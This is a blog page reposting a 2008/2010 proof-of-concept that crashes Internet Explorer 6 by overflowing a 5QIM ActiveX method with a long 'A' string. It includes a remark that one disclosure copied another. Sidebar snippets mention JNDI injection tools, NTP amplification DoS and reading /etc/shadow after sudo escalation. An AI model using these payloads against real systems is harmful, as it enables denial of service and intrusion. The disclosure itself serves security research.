IE 6.0 - Local Crash Exploit

最新推荐文章于 2024-09-17 11:42:54 发布
最新推荐文章于 2024-09-17 11:42:54 发布
阅读量363 收藏
点赞数
分类专栏: 安全漏洞 文章标签: crash ie object javascript date 2010 

###############################################################################################
5QIM 2.0.0.9 IE Crash Exploit
2008-02-25 08:26

<object id="xiaonei" classid="clsid:5C56F4A7-71FC-4FFD-A9D7-18FB87A9DFC6" 
style="display:none;">
</object>
<script>
function crash() {
var buff = '';
for(i=0;i<=5000;i++) {buff+="AAAAAAAAAA";}
object = document.getElementById("xiaonei");
object.Start5QIMWithItv('test','test',buff);
}
</script>
<pre>
<a href="javascript:;" OnClick="crash()">Crash...</a>
</pre>

###############################################################################################
and:

On Sat, 20 Mar 2010, info@securitylab.ir wrote:
 ###############################################################################################
# Securitylab.ir
 ###############################################################################################
Vul:

<object id="opi" classid="clsid:5C56F4A7-71FC-4FFD-A9D7-18FB87A9DFC6" style="display:none;">
</object>
<script>
function crash() {
var buff = '';
for(i=0;i<=5000;i++) {buff+="AAAAAAAAAA";}
object = document.getElementById("opi");
object.Start5QIMWithItv('test','test',buff);
}
</script>
<pre>
<a href="javascript:;" OnClick="crash()">.!.</a>
</pre>
###############################################################################################
# IE 6.0 Local Crash Exploit , By: Pouya Daneshmand (whh_iran@yahoo.com,Pouya.Securitylab.ir)
 ###############################################################################################

Yep - the date, the object name and the attribution.

hrh2010
关注
专栏目录
OSCP Learning Notes - Privilege Escalation
weixin_30642561的博客
07-29 4122
Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https://www.vulnhub.com/entry/basic-pentesting-1,216/ 1.Scan the target server using nmap. nmap...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
该压缩包"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"可能包含了一个JNDI注入攻击的示例或者测试工具,"SNAPSHOT"通常表示这是一个开发中的版本,可能尚未经过完整测试,因此可能存在漏洞或不稳定性。使用这样的...
Exploit writing tutorial part1: Stack Based Overflows
Nixawk
06-28 2318
Author: Corelan Team (corelanc0d3r) Modify: Nixawk This tutorial will show you how to exploit a software from stack overflow.Requirements Software: Easy RM to MP3 Converter Version 2.7.3.700.2006.09
vulnHub-sick0s1.1学习 两种解法
m0_50431798的博客
06-07 1434
查看cat /etc/shadow说是权限不足,那就提权,使用sudo -l查看权限,全all,那就可以使用sudo su提权,提权后再查看/etc/shadow文件。通过这个可以确定用户名大概率是admin,但是密码不清楚,那就尝试弱口令,弱口令不可以就进行爆破,不过这个尝试5次失败就会禁止30秒,可以通过其他方式进行绕过。使用dirsearch扫描可以看到/index.php/login/ ,一个登录链接。查看passwd表可以看到有/bin/bash的用户有root,sickos。
Exploit writing tutorial part 1 Stack Based Overflows
I'm a hack----
11-01 2324
Last friday (july 17th 2009), somebody (nick)named ‘Crazy_Hacker’ has reported a vulnerability in Easy RM to MP3 Conversion Utility (on XP SP2 En), via packetstormsecurity.org. (see http://packets
Android-SEAndroid权限问题指南
IT先森
07-11 1万+
Android-SEAndroid权限问题指南 前言 SEAndroid是在Android系统中基于SELinux推出的强制访问控制模型,来完善自主访问模型中只要取得root权限就可以为所欲为的情况。 SELinux是一种基于域-类型(domain-type)模型的强制访问控制(MAC)安全系统,其原则是...
《Metasploit 魔鬼训练营》03 情报搜集技术
kevinhanser
09-07 7058
本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程 1. 外围信息搜集 2. 主机探测与端口扫描 3. 服务扫描与查点 4. 网络漏洞扫描 5. 渗透测试数据库与共享
【废了-准备删除02】信息收集——基于WAMP的drupal7.x管理系统
Fighting_hawk的博客
03-23 1万+
1.本节内容对目标站点进行信息收集,包括IP、端口、目录、指纹等,为后续渗透测试提供了方向。 2. 对于139端口,是samba服务端口,可以考虑爆破、未授权访问、远程代码执行。 3.对于445端口,是SMB服务端口,可以考虑空会话攻击。 4.对于3306端口,可以考虑注入、提权、爆破。 5. 对于80端口,可以考虑Web 攻击、爆破、对应服务器版本漏洞。...
Kali Linux 网络扫描秘籍 第六章 拒绝服务(二)
热门推荐
龙哥盟
11-24 4万+
第六章 拒绝服务(二) 作者:Justin Hutchens 译者:飞龙 协议:CC BY-NC-SA 4.0 6.6 NTP 放大 DoS 攻击NTP 放大 DoS 攻击利用响应远程 monlist 请求的网络时间协议(NTP)服务器。 monlist 函数返回与服务器交互的所有设备的列表,在某些情况下最多达 600 个列表。 攻击者可以伪造来自目标 IP 地址的请求,并且
Mcirosoft Visual Basic 6.0的两个潜堆溢出POC
葉落堂
05-26 1006
Microsoft Visual Basic 6.0 Project (Description) Stack overflow PoC  #!/usr/local/bin/perl#Discovered By UmZ (Umair Manzoor)#comments are welcome at umz32.dll[at]gmail.com#Dated 23-02-2007#Time :
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip
12-12
标题"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip"暗示了这是一个关于JNDI注入漏洞的exploit工具包,版本为1.0 SNAPSHOT,可能包含了多个利用示例或攻击代码。"all"可能表示该压缩包包含了所有相关的组件或测试...
JNDI-Inject-Exploit
11-04
# JNDI-Inject-Exploit ## 免责声明 本工具仅面向**合法授权的企业安全测试**,如您需测试本工具的可用性请自行搭建靶机环境,在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的...
jndi-JNDI-Injection-Exploit
12-27
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。 (可选项 , 默认命令是mac下打开计算器,即"open /Applications/Calculator....
js中【Worker】相关知识点详细解读
2301_79858914的博客
09-11 910
JavaScript 中的 Worker 是一个可以在后台线程中运行代码的 API,这样可以避免主线程(通常是 UI 线程)被阻塞。使用 Worker 时,JavaScript 可以在多线程环境中工作,解决了单线程的瓶颈问题。通常情况下,JavaScript 是单线程的,也就是所有的代码(包括 DOM 操作和事件处理等)都在同一个线程里执行。如果某段代码需要大量计算,或者运行时间过长,会阻塞整个页面,导致界面卡顿甚至崩溃。Worker提供了一种将复杂或耗时的任务分配到后台线程执行的方法。
JavaScript】LeetCode:707设计链表
weixin_45980065的博客
09-14 660
【代码】【JavaScript】LeetCode:707设计链表。
前端vue3打印,多页打印,不使用插件(工作中让我写一个打印功能)
最新发布
m0_51798113的博客
09-17 454
getTableData().tableData,其实就是去后端获取参数去了,因为这是公司的前端框架,基于vxe的,包装的方法,获取了一个表格信息,相当于获取参数。说下总体思路,创建一个组件,里面放多个span字段,然后根据父组件传入的参数,生成子组件,最好我们打印子组件的信息即可。这里也很关键,中间我遇到一个问题,那就是经常第一次点击按钮,dom元素没有加载完,就弹出打印框了,所以我加了一个异步事件,还有记得把抽屉关了。
使用 uni-app 开发微信小程序的详细指南
2301_79685859的博客
09-16 772
uni-app是一个使用 Vue.js 框架开发跨平台应用的前端框架。开发者通过编写一套代码,可以生成多端应用,包括 H5、iOS、Android、微信小程序、支付宝小程序、字节跳动小程序等。
tp-link_exploit
11-21
tp-link_exploit是指针对TP-Link路由器和网络设备存在的安全漏洞进行攻击的行为。在过去的一段时间里,有一些黑客和攻击者发现了TP-Link设备中的一些漏洞,并利用这些漏洞来获取未经授权的访问权限,或者进行其他...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值